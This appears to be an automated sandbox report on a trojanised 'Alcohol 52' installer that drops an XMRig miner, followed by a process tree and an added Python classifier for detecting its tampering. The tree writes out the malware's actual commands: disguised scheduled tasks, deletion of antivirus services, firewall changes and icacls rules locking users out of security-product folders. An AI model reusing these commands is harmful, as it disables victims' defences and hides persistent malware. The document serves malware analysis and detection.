Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01-06-2024 03:28

General

  • Target

    Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe

  • Size

    871KB

  • MD5

    a801066da12e786c0277e70c191bc936

  • SHA1

    2920b27e50c079f99502d2f574655e20657bdebd

  • SHA256

    599297d2596c79c0f43b555a88a77f7f89943397298a60cf7fc991b6d0e696c3

  • SHA512

    31292e5ebebb03de4018b04a28324c65e36656472cdc98328ad4f77544a762f5f0c397b6f12c886272fc08f4d9fa7579560e0cf33f02e19af4fd7e7731d619d8

  • SSDEEP

    12288:GCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBgasLvhpFQ:GCdxte/80jYLT3U1jfsWasDbFQ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 6 IoCs
  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
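
Added here as an editorial example, not part of the sandbox report or of any tool it references: a small Python classifier that applies the tamper patterns recorded in the process tree below (schtasks persistence launched from ProgramData with /RL HIGHEST, sc stop/delete of security services, inbound SMB/NetBIOS firewall blocks, icacls /deny of full control to the user or SYSTEM) to a batch of process command lines such as Sysmon Event ID 1 would give you. The sample lines are constructed from commands on this page plus two benign lines; the service watchlist is assembled from the names the sample touches and is an assumption, not a vendor list.

```python
import re

# Service names the sample stops or deletes (taken from the process tree on this page).
# swprv is the Microsoft Software Shadow Copy Provider; the others belong to third-party
# anti-malware products. Constructed watchlist, not a vendor-maintained one.
WATCHED_SERVICES = {"mbamservice", "bytefenceservice", "swprv", "crmsvc"}

# Task actions launched from these roots are unusual for a task running with /RL HIGHEST.
SUSPICIOUS_TASK_ROOTS = ("c:\\programdata\\", "c:\\users\\")

SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.I)
TASK_ACTION = re.compile(r'/TR\s+("[^"]*"|\S+)', re.I)
RUN_LEVEL_HIGHEST = re.compile(r'/RL\s+HIGHEST\b', re.I)
SC_STOP_DELETE = re.compile(r'\bsc(?:\.exe)?\s+(stop|delete)\s+(\S+)', re.I)
NETSH_BLOCK_RULE = re.compile(
    r'netsh(?:\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=block\b', re.I)
LOCALPORT = re.compile(r'localport=(\d+)', re.I)
ICACLS_DENY = re.compile(r'\bicacls(?:\.exe)?\b.*?/deny\s+([^:\s]+):(\S+)', re.I)


def classify(cmdline: str) -> list[str]:
    """Return the names of the tamper rules a single process command line triggers."""
    hits: list[str] = []

    # 1. Scheduled task with highest run level whose action lives under ProgramData/Users,
    #    like the RealtekHD/WindowsTask tasks created every minute and at logon.
    if SCHTASKS_CREATE.search(cmdline) and RUN_LEVEL_HIGHEST.search(cmdline):
        m = TASK_ACTION.search(cmdline)
        action = m.group(1).strip('"').lower() if m else ""
        if action.startswith(SUSPICIOUS_TASK_ROOTS):
            hits.append("schtasks_highest_from_programdata")

    # 2. sc stop/delete against a service on the watchlist (AV services, shadow copy provider).
    m = SC_STOP_DELETE.search(cmdline)
    if m and m.group(2).lower() in WATCHED_SERVICES:
        hits.append(f"sc_{m.group(1).lower()}_security_service")

    # 3. Inbound block rule for SMB/NetBIOS ports (445, 139) added via netsh.
    if NETSH_BLOCK_RULE.search(cmdline) and set(LOCALPORT.findall(cmdline)) & {"445", "139"}:
        hits.append("firewall_block_inbound_smb")

    # 4. icacls /deny of full control; denying SYSTEM is the stronger signal because it
    #    locks services running as LocalSystem (including AV) out of their own directories.
    m = ICACLS_DENY.search(cmdline)
    if m and "(F)" in m.group(2).upper():
        hits.append("icacls_deny_full_control")
        if m.group(1).lower() == "system":
            hits.append("icacls_deny_system")
    return hits


def scan(cmdlines) -> dict[str, list[str]]:
    """Group a batch of command lines by the rule they trigger."""
    findings: dict[str, list[str]] = {}
    for line in cmdlines:
        for rule in classify(line):
            findings.setdefault(rule, []).append(line)
    return findings


# Constructed sample: six lines copied from the process tree on this page, two benign lines.
SAMPLE_CMDLINES = [
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" '
    r'/TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'sc delete mbamservice',
    r'sc config appidsvc start= auto',
    r'netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN',
    r'icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)',
    r'icacls c:\programdata\Malwarebytes /deny System:(F)',
    r'schtasks /create /TN "Backup\Nightly" /TR "C:\Program Files\Backup\run.exe" /SC DAILY',
    r'icacls C:\share /grant Users:(OI)(CI)(RX)',
]

if __name__ == "__main__":
    for rule, lines in scan(SAMPLE_CMDLINES).items():
        print(rule)
        for line in lines:
            print("   ", line)
```

The rules are deliberately narrow: `sc config appidsvc start= auto` from the same tree is not flagged, because enabling a built-in service is routine administration on its own; it only becomes interesting in the context of the surrounding DisallowRun and icacls activity, which is what the grouping in `scan` is for.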

Processes

  • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe
    "C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:208
    • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
      C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\ProgramData\Setup\update.exe
        "C:\ProgramData\Setup\update.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Blocks application from running via registry modification
        • Drops file in Drivers directory
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies WinLogon
        • Drops file in Program Files directory
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\ProgramData\Setup\taskhost.exe
          C:\ProgramData\Setup\taskhost.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:2184
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
            5⤵
            • Drops file in Drivers directory
            PID:2508
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:4332
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:2252
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:3200
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4992
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2012
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4120
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3812
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            5⤵
            • Launches sc.exe
            PID:4332
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            5⤵
            • Launches sc.exe
            PID:564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            5⤵
            • Launches sc.exe
            PID:4936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            5⤵
            • Launches sc.exe
            PID:4608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4868
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            5⤵
            • Launches sc.exe
            PID:548
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            5⤵
            • Launches sc.exe
            PID:4852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1248
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            5⤵
            • Launches sc.exe
            PID:1768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          4⤵
          PID:4996
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            5⤵
            • Launches sc.exe
            PID:1636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          4⤵
          PID:4860
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            5⤵
            • Launches sc.exe
            PID:416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          4⤵
          PID:3464
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            5⤵
            • Launches sc.exe
            PID:3996
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          4⤵
          PID:3852
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            5⤵
            • Modifies Windows Firewall
            PID:2252
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          4⤵
          PID:1916
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:3980
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          4⤵
          PID:1396
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:1376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          4⤵
          PID:4120
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:1860
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          4⤵
          PID:3692
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:1224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3040
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          4⤵
          PID:4576
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2568
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:5084
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          4⤵
          PID:3212
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1380
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:5012
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          4⤵
          PID:2908
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:4864
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1720
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          4⤵
          PID:4104
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:3580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3444
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          4⤵
          PID:3992
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1896
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3996
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          4⤵
          PID:1160
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1864
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
          4⤵
          PID:516
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Admin:(F)
            5⤵
            • Modifies file permissions
            PID:4976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          4⤵
          PID:956
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            5⤵
            • Modifies file permissions
            PID:2180
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
          4⤵
          PID:4388
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Admin:(F)
            5⤵
            • Modifies file permissions
            PID:3960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          4⤵
          PID:4608
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            5⤵
            • Modifies file permissions
            PID:3040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
          4⤵
          PID:232
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          4⤵
          PID:3036
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3592
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3784
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4944
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
          4⤵
          PID:4868
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          4⤵
          PID:1768
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2952
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2012
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:952
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3444
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:216
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:836
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:5092
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3628
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:64
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:4976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
          4⤵
                                                                                    PID:4124
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                      5⤵
                                                                                      • Modifies file permissions
                                                                                      PID:3952
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                    4⤵
                                                                                      PID:4576
                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                        5⤵
                                                                                        • Modifies file permissions
                                                                                        PID:1932
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                      4⤵
                                                                                        PID:564
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                          5⤵
                                                                                          • Modifies file permissions
                                                                                          PID:2560
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                        4⤵
                                                                                          PID:4844
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                            5⤵
                                                                                            • Modifies file permissions
                                                                                            PID:2340
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                          4⤵
                                                                                            PID:2500
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                              5⤵
                                                                                              • Modifies file permissions
                                                                                              PID:3384
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                            4⤵
                                                                                              PID:2472
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                5⤵
                                                                                                • Modifies file permissions
                                                                                                PID:3212
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                              4⤵
                                                                                                PID:3724
                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                  icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                  5⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:2644
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                4⤵
                                                                                                  PID:2956
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                    5⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:3484
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                  4⤵
                                                                                                    PID:4864
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                      5⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:1620
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                    4⤵
                                                                                                      PID:4888
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                        5⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:1976
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                        PID:1300
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                          5⤵
